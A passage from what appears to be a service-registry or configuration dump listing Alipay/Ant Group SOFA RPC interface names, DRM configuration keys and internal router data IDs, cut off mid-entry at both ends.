ayFacade:1.0:mservice_smartcall_baseInfoFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:ficcbffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_business_account_credit_black_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.dataquality.api.DqAlarmSubscribeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.157.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.before.InvestLOIManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.concurrentByInstIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.common.facade.service.FundProtocolMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.WithdrawQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.ecoqltprod.EcoqltprodFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.common.service.facade.apoint.service.AlipayPointSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bizlog.KbBizCommonLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.moneyfund.api.MftransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.bff.AuditQueryBffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.SupplementService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:csinsight_TagProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.task.TaskCallBackFacade:1.0:fsOpenAccountAsyncRetryCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.facade.validator.CtuEventInfoCompareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterReconMappingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.MerchantProtocolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:modifySignContractHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.ParticipatedBizRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterReportBankFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-48#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.common.CommonServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.serverMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.metadata.api.BizEntityLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizPhyModelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.mockdata.MockGzoneDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-hksocialsharetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.pcard.VcpCardCampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ordermng.common.service.api.order.RejectReasonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instfund.facade.api.InstAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.label.MsgLabelSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.service.facade.LoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Exchangecore-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antopo.common.service.facade.biz.application.AnnouncementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.SchoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arulemng.common.service.facade.condition.RuleConditionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.fullCrowdScenario,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.risk.api.LegoMonitorProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.point.service.PointSignInService:1.0:pointSignInService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcore.common.service.facade.api.CirculateControlServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.doc.CollectionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.253.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.feature.common.service.facade.sql.service.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.revtransTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfsettleprod.facade.InvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.qualificationMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_MSG_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingcore.common.service.facade.prizeexchange.InsMktPrizeExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.consumeprod.common.service.facade.ConsumeOverviewRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icfmng.common.service.facade.api.BillReconApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CategoryConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.user.UserReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.BikeRidingEnergyConfigServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.ForthVeinsInjectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshysale.common.service.facade.meshycustomer.MeshyCustomerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.RuleDimensionManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.bizrecon.CheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.ide.facade.api.IdeUdfOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlmng.core.service.common.interfaces.RiskLevelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.link.facade.LiveMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerWarnMangerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilySharingAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.management.RuleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacportal.common.service.integration.iprodquery.ContractMngQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fincommonbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_F_INTCLCN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityidentify.service.privacyquestion.PrivacyQuestionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:nfccdbsync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.holoxtask.service.task.HoloxAsynContentCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.account.api.UserIdentifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.CreditAccountOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.OrderStatusChangeTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.IntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cfpcenter.cfpcenter_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.asserts.optimization.facade.AssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.schudeler.RiskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.limitcenter.service.facade.accumulate.api.LimitAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.atdatacollect.common.facade.BlockChainContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.taobao.pagani2.open.sdk.api.service.LaunchTouchService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pucprod.common.service.facade.jiaofei.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.4.229.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.api.AssetDirectTallyTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_FEE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbgrouppurchaseprod.common.service.facade.order.GroupPurchaseOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.trans.api.BatchTransConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.easytree.SceneInfoAdminService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.OperateLogQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.manage.api.EntryQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalPlanManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.InnerMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.prod.CampaignApplyHKFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipaycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.UserTrackRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.ContentReleasedCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.CampaignOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.IMessageAssembleService:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.marketing.activity.service.facade.MarketingActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.poscoreTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rule.common.base.service.ScriptValidateService:1.0:${rule_service_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.file.ControlResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.134.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchselfop.common.service.facade.gateway.BizProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.ram.RestAuthorizationService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.partner.api.PartnerPropertyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:ruleApplicationConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.platform.common.service.facade.api.project.ProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.operation.common.service.facade.api.RouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.xviewcore:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.consistMaxRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.TXRechargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.logistics.facade.ConsumerNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ActionRamInfoServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:multimediabase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.uniform.facade.UniformItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.AstAllocationDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupClusterDbkey.airbops_one_oss_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromoguard.facade.scene.api.SceneConfigVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.fatigue.api.FatigueControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.TodoTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finuserquote.facade.sync.RealTimeBroadcastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.supportprod.facade.bds.facade.kaproject.BdsSolutionRunQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.api.transaction.MessageReceiveService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1102#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antcloud.acbillingcore.common.service.facade.BussAdjustFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.tddl.v1_app_processmng.dbweight#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zhubalipay.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.bumng.common.service.facade.OrganizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:openhomespecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APIGlobalConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityops.common.service.facade.api.SecOpsCloudChangeInfoNotifier:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.DataRecover:1.0:bkebppcenter_data_recover@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINDTPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.TaskCatQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.31.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.NewRiskAdvicePolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.mobile.component.common.facade.appcenter.SubappConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.PriceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_XVIEWCONSOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.promogames.manage.MngPromoGamesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.sync.WorkTicketQueryCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.RecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyoptprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acmarketingcore.common.service.facade.activity.ActivityInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.strategy.SmartAntFinStrategyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.212.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antthoth.service.facade.BizSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesOrderLmyhRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmhatcher.common.service.facade.api.ZmBenefitConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.metric.MetricDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.CardDataCfgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.roster.RosterListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.territory.TerritoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zappinfo.zappinfo_remote_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchfund.common.service.facade.trans.api.BatchTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.search.CptorAccountSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_pfunddts_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.uat.UTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.midas.platform.aghanimplus.wrap.MidasAmbushDrmSwitch.switchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.ldc.demo.TestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unimetaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.AppletTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.181.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.0.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbmemberprod.common.service.facade.api.tr.action.UserActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.hainaprod.common.service.facade.api.market.resource.MarketResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.swiftweb.facade.ZdalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessBizBudgetRejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-rccenter-taskMsg#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.testRunJdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yungenew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finxbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthMobileEwcProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdWebICPQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.180.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.facade.CodeApiGFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.transfercenter.common.service.facade.api.TransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamReso